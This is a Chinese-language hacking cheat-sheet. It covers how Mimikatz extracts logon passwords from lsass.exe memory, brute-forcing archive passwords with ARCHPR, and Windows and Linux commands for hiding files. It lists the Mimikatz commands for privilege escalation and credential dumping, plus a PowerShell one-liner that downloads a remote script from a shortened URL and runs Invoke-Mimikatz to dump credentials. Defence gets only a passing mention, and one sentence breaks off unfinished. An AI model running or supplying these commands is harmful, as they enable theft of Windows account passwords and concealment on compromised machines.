windows系统漏洞
巨硬公司会定期将软件产品中发现的重大问题以安全公告的形式公布于众,可在 安全公告 上查看。 公告解释:
Mimikatz
Windows密码抓取神器 指南&命令参考 亦可提升进程权限 注入进程 读取进程内存 抓取原理: win登录的时候输入的密码,经过lsass.exe里的wdigest和tspkg两个模块调用后,它们对之进行加密处理,而没有进行擦除,而且该加密通过特征可以定位,并且按照微软的算法可逆。 简单地说,在Windows中,当用户登录时,lsass.exe使用一个可逆的算法,加密过的明文密码,并且把密文保存在内存中,没有清理,然后可以抓出来,还原。
抓取密码常用命令
privilege::debug //提升权限 sekurlsa::logonpasswords //抓取密码
一个powershell脚本将mimikatz注入到内存并自动调用logonPasswords获取密码(墙)
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz -DumpCreds"
如何防御: 更新补丁注册表
压缩包破解
目前的压缩包破解工具基本都是利用穷举法,一个一个密码的去尝试,而这种方法效率低,成功率低,如果密码稍微长一些或者加入中文,那代价将是非常高的。如果有一个比较好用的字典,可以将消耗的时间大大的减少。
以下为两个破解方法:
- 首先可以使用工具去除压缩包的密码,而不是去暴力破解 Advanced rar repair 便是一款此类软件,但基本上去除密码的压缩包都会损坏,个别类型文档完好。而且该软件只支持RAR格式的压缩包。
- 另一种就是直接暴力破解,ARCHPR 是一个破解简单压缩包密码工具,支持自定义字典,但是速度并不是很快……并且该软件
文件隐藏命令、工具
win下:
- [md 命令]–创建新的子目录
- [attrib命令]–修改属性
- ATTRIB [+R|-R] [+A|-A] [+S|-S] [+H|-H] [[drive:] [path] filename] [/S [/D]
- R只读文件属性;A存档文件属性;S系统文件属性;H隐藏文件属性; 可以完全隐藏一个文件 —> [attrib +h +r +s filename]
Linux下:
- [mkdir] –创建文件夹
- [mv]–移动文件或改名
- -b :若需覆盖文件,则覆盖前先行备份。
- -f :force 强制的意思,如果目标文件已经存在,不会询问而直接覆盖;
- -i :若目标文件已经存在时,就会询问是否覆盖
- -u :若目标文件已经存在,且source比较新,才会更新
- -t : –target-directory=DIRECTORY move all SOURCE arguments into DIRECTORY,即指定mv的目标目录,该选项适用于移动多个源文件到一个目录的情况,此时目标目录在前,源文件在后。